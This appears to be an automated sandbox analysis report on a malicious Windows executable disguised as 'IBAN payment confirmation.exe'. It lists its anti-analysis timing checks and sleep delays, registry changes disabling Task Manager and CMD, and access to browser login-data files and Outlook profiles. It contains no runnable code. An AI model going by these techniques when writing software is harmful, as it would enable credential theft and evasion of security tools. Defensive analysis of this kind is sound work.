            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeAPI/Special instruction interceptor: Address: 5502994
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeAPI/Special instruction interceptor: Address: 3872994
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeRDTSC instruction interceptor: First address: 54C9E75 second address: 54C9E75 instructions: 0x00000000 rdtsc 0x00000002 cmp ecx, 120D9635h 0x00000008 cmp ebx, ecx 0x0000000a jc 00007F65A8DE1B0Bh 0x0000000c cmp dx, cx 0x0000000f inc ebp 0x00000010 test bx, bx 0x00000013 inc ebx 0x00000014 cmp bh, 00000077h 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeRDTSC instruction interceptor: First address: 3839E75 second address: 3839E75 instructions: 0x00000000 rdtsc 0x00000002 cmp ecx, 120D9635h 0x00000008 cmp ebx, ecx 0x0000000a jc 00007F65A8EACBBBh 0x0000000c cmp dx, cx 0x0000000f inc ebp 0x00000010 test bx, bx 0x00000013 inc ebx 0x00000014 cmp bh, 00000077h 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeMemory allocated: 36F30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeMemory allocated: 36D40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 599422Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 599312Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 599203Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 599093Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 598984Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 598875Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 598765Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 598656Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 598547Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 598422Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 598312Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 598203Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 598093Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 597984Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 597875Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 597765Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 597655Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 597547Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 597422Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 597312Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 597203Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 597093Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 596984Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 596875Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 596765Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 596656Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 596546Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 596437Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 596328Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 596218Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 596109Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 596000Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 595890Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 595781Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 595672Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 595562Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 595452Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 595341Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 595219Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 595109Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 594999Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 594890Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 594781Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 594672Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 594562Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeWindow / User API: threadDelayed 1837Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeWindow / User API: threadDelayed 8021Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsl71F.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeAPI coverage: 3.0 %
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -25825441703193356s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4716Thread sleep count: 1837 > 30Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4716Thread sleep count: 8021 > 30Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -599765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -599547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -599422s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -599312s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -599203s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -599093s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -598984s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -598875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -598765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -598656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -598547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -598422s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -598312s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -598203s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -598093s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -597984s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -597875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -597765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -597655s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -597547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -597422s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -597312s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -597203s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -597093s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -596984s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -596875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -596765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -596656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -596546s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -596437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -596328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -596218s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -596109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -596000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -595890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -595781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -595672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -595562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -595452s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -595341s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -595219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -595109s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -594999s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -594890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -594781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -594672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exe TID: 4876Thread sleep time: -594562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 0_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405772
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 0_2_0040622D FindFirstFileW,FindClose,0_2_0040622D
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_00402770 FindFirstFileW,11_2_00402770
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_00405772
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_0040622D FindFirstFileW,FindClose,11_2_0040622D
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 599422Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 599312Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 599203Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 599093Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 598984Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 598875Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 598765Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 598656Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 598547Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 598422Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 598312Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 598203Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 598093Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 597984Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 597875Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 597765Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 597655Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 597547Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 597422Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 597312Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 597203Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 597093Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 596984Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 596875Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 596765Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 596656Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 596546Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 596437Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 596328Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 596218Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 596109Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 596000Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 595890Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 595781Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 595672Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 595562Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 595452Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 595341Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 595219Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 595109Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 594999Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 594890Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 594781Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 594672Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeThread delayed: delay time: 594562Jump to behavior
            Source: IBAN payment confirmation.exe, 0000000B.00000002.2509476832.00000000069F8000.00000004.00000020.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000002.2509476832.0000000006A4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeAPI call chain: ExitProcess graph end nodegraph_0-4798
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeAPI call chain: ExitProcess graph end nodegraph_0-4803
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 0_2_00406254 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406254
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeProcess created: C:\Users\user\Desktop\IBAN payment confirmation.exe "C:\Users\user\Desktop\IBAN payment confirmation.exe"Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeQueries volume information: C:\Users\user\Desktop\IBAN payment confirmation.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 0_2_00405F0C GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405F0C
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeRegistry value created: DisableTaskMgr 1Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeRegistry value created: DisableCMD 1Jump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0000000B.00000002.2529825283.000000003705A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: IBAN payment confirmation.exe PID: 3824, type: MEMORYSTR
            Source: Yara matchFile source: 0000000B.00000002.2529825283.000000003705A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: IBAN payment confirmation.exe PID: 3824, type: MEMORYSTR
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 0000000B.00000002.2529825283.000000003705A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: IBAN payment confirmation.exe PID: 3824, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 0000000B.00000002.2529825283.000000003705A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: IBAN payment confirmation.exe PID: 3824, type: MEMORYSTR
            Source: Yara matchFile source: 0000000B.00000002.2529825283.000000003705A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
